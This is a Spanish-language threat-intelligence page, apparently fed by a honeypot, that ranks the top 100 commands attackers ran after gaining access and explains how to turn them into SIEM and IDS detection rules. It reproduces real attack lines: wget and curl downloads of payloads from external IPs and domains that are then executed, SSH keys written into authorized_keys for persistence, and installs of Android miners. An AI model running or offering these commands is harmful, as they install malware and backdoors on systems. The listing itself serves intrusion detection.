Actualizado: abril de 2026

Top 100 Comandos Maliciosos

Los comandos más ejecutados por atacantes tras obtener acceso a un sistema. Útil para detección de intrusiones y respuesta a incidentes.

6,151 comandos en 24h
1.
$Enter new UNIX password:
100 IPs280x
2.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
161 IPs265x
3.
$lockr -ia .ssh
161 IPs265x
4.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
159 IPs262x
5.
$uname -m
157 IPs262x
6.
$crontab -l
157 IPs261x
7.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
158 IPs261x
8.
$cat /proc/cpuinfo | grep name | wc -l
157 IPs260x
9.
$ls -lh $(which ls)
157 IPs260x
10.
$which ls
157 IPs260x
11.
$w
156 IPs260x
12.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
157 IPs260x
13.
$uname
154 IPs258x
14.
$uname -a
155 IPs258x
15.
$cat /proc/cpuinfo | grep model | grep name | wc -l
155 IPs258x
16.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
154 IPs258x
17.
$top
155 IPs256x
18.
$whoami
153 IPs256x
19.
$lscpu | grep Model
152 IPs255x
20.
$pm list packages 2>/dev/null
1 IPs141x
21.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
85 IPs118x
22.
$cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||curl -so b http://196.251.107.133/bins/parm7 2>/dev/null||toybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null);chmod 777 b 2>/dev/null;(su 0 ./b adb||./b adb) 2>/dev/null;rm -f b;(wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||curl -so b ht
1 IPs68x
23.
$/bin/./uname -s -v -n -r -m
13 IPs51x
24.
$pkill -f xig-miner 2>/dev/null
1 IPs15x
25.
$pkill -f xmr-stak 2>/dev/null
1 IPs15x
26.
$pkill -f xig 2>/dev/null
1 IPs15x
27.
$pkill -f minerd 2>/dev/null
1 IPs15x
28.
$pkill -f minergate 2>/dev/null
1 IPs15x
29.
$if [ -e '/data/app/com.ufo.miner-1' ]; then echo 'exists'; else touch '/data/app/com.ufo.miner-1' && chmod 000 '/data/app/com.ufo.miner-1' && echo 'blocked' || echo 'failed'; fi
1 IPs15x
30.
$pkill -f trinity 2>/dev/null
1 IPs15x
31.
$pkill -f ethminer 2>/dev/null
1 IPs15x
32.
$pkill -f cpuminer 2>/dev/null
1 IPs15x
33.
$if [ -e '/data/app/com.ufo.miner-2' ]; then echo 'exists'; else touch '/data/app/com.ufo.miner-2' && chmod 000 '/data/app/com.ufo.miner-2' && echo 'blocked' || echo 'failed'; fi
1 IPs15x
34.
$if [ -e '/data/data/com.ufo.miner' ]; then echo 'exists'; else touch '/data/data/com.ufo.miner' && chmod 000 '/data/data/com.ufo.miner' && echo 'blocked' || echo 'failed'; fi
1 IPs15x
35.
$if [ -e '/data/local/tmp/ufo.apk' ]; then echo 'exists'; else touch '/data/local/tmp/ufo.apk' && chmod 000 '/data/local/tmp/ufo.apk' && echo 'blocked' || echo 'failed'; fi
1 IPs15x
36.
$pkill -f xmrig 2>/dev/null
1 IPs15x
37.
$uname -s -v -n -r -m
6 IPs11x
38.
$uname -s -m
10 IPs10x
39.
$echo mirai
5 IPs9x
40.
$cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget https://tg-xxooxx888.8964.mom/loader.sh -O .x 2>/dev/null || curl -s https://tg-xxooxx888.8964.mom/loader.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x
4 IPs8x
41.
$pm install /data/local/tmp/ufo.apk
4 IPs7x
42.
$rm -f /data/local/tmp/ufo.apk
4 IPs7x
43.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
4 IPs7x
44.
$rm -rf /data/local/tmp/*
4 IPs7x
45.
$pm path com.ufo.miner
4 IPs7x
46.
$ps | grep trinity
4 IPs7x
47.
$/data/local/tmp/nohup /data/local/tmp/trinity
4 IPs7x
48.
$chmod 0755 /data/local/tmp/trinity
4 IPs7x
49.
$chmod 0755 /data/local/tmp/nohup
4 IPs7x
50.
$am start -n com.ufo.miner/com.example.test.MainActivity
4 IPs7x
51.
$User-Agent: Go-http-client/1.1
1 IPs6x
52.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
1 IPs6x
53.
$Connection: close
1 IPs6x
54.
$curl2
1 IPs5x
55.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs5x
56.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs5x
57.
$/ip cloud print
2 IPs4x
58.
$system
2 IPs4x
59.
$cd /data/local/tmp/; busybox wget http://142.248.80.144/w.sh; sh w.sh; curl http://142.248.80.144/c.sh; sh c.sh
1 IPs4x
60.
$shell
2 IPs4x
61.
$uname -s -v -n -m 2 > /dev/null
1 IPs3x
62.
$curl: option -L not recognized curl: try curl --help or curl --manual for more information
1 IPs3x
63.
$curl: option -L not recognized curl: try 'curl --help' or 'curl --manual' for more information
1 IPs3x
64.
$curl -Lso- https://raw.githubusercontent.com/catherine935/rmto238na/refs/heads/main/install.sh | bash
1 IPs3x
65.
$uname -m 2 > /dev/null
1 IPs3x
66.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $
1 IPs3x
67.
$User-Agent: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.119.1.el7.x86_64
1 IPs2x
68.
$Connection: keep-alive
1 IPs2x
69.
$then
1 IPs2x
70.
$sh
2 IPs2x
71.
$q
1 IPs2x
72.
$Accept: */*
1 IPs2x
73.
$pwd
1 IPs2x
74.
$nproc
1 IPs2x
75.
$Accept-Encoding: gzip, deflate
1 IPs2x
76.
$if [ [ ! -d ${HOME}/.ssh ] ]
1 IPs2x
77.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs2x
78.
$enable
2 IPs2x
79.
$Accept-Encoding: gzip
1 IPs2x
80.
$echo "123456\nUpsrJvPEvcmZ\nUpsrJvPEvcmZ\n"|passwd
1 IPs1x
81.
$echo "123456\nOcmqA9Vh8cHP\nOcmqA9Vh8cHP\n"|passwd
1 IPs1x
82.
$echo "123456\nC1aybUhw19hi\nC1aybUhw19hi\n"|passwd
1 IPs1x
83.
$echo "123456\nBYPnA4XnfaWr\nBYPnA4XnfaWr\n"|passwd
1 IPs1x
84.
$cd /tmp || cd /run || cd /var/run || cd /dev/shm; wget http://127.0.0.1/install.sh -O .x 2>/dev/null || curl -s http://127.0.0.1/install.sh -o .x; chmod 777 .x; ./.x telnet; rm -f .x
1 IPs1x
85.
$echo "123456\n5CzcoHhAxzv9\n5CzcoHhAxzv9\n"|passwd
1 IPs1x
86.
$echo "123456\n4R61JHPfWsfw\n4R61JHPfWsfw\n"|passwd
1 IPs1x
87.
$echo "123456\n34060ElMba3A\n34060ElMba3A\n"|passwd
1 IPs1x
88.
$echo "123456\n25hCQLqiY1LV\n25hCQLqiY1LV\n"|passwd
1 IPs1x
89.
$cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox SNMSD
1 IPs1x
90.
$echo "123456\n0vaD3XSAJyUz\n0vaD3XSAJyUz\n"|passwd
1 IPs1x
91.
$echo "123321\ncsYEs00u8EyI\ncsYEs00u8EyI\n"|passwd
1 IPs1x
92.
$echo "123321\n2aZi3CMBrrzf\n2aZi3CMBrrzf\n"|passwd
1 IPs1x
93.
$echo "123123123\npIf6wgB303UU\npIf6wgB303UU\n"|passwd
1 IPs1x
94.
$echo "123123123\ndNmJXlAVD1Wy\ndNmJXlAVD1Wy\n"|passwd
1 IPs1x
95.
$echo "ali#\njbhogoZ2jzkE\njbhogoZ2jzkE\n"|passwd
1 IPs1x
96.
$echo "123123123\nIRxZDKn29Ye9\nIRxZDKn29Ye9\n"|passwd
1 IPs1x
97.
$echo "ali#\nQYvSMd3iyvqm\nQYvSMd3iyvqm\n"|passwd
1 IPs1x
98.
$echo "admin\n8BNle5P7NpQG\n8BNle5P7NpQG\n"|passwd
1 IPs1x
99.
$echo "123123123\nCy9L9iiO5NPk\nCy9L9iiO5NPk\n"|passwd
1 IPs1x
100.
$echo "abc123\nCkY7LKbfySOk\nCkY7LKbfySOk\n"|passwd
1 IPs1x

Reconocimiento

uname, whoami, cat /etc/passwd

Descarga

wget, curl, tftp

Persistencia

crontab, chmod, chattr

Mov. Lateral

ssh, scp, ping

Uso para Detección

Estos comandos pueden usarse para crear reglas de detección en SIEM, IDS/IPS y sistemas de monitorización. Monitoriza estos patrones en tus logs para detectar intrusiones. Ten en cuenta que las IPs, dominios y nombres de archivo del listado cambian con frecuencia, por lo que las reglas basadas en el patrón de la acción (por ejemplo, `chattr -ia .ssh` seguido de una escritura en `authorized_keys`) son más duraderas que las basadas en un indicador concreto.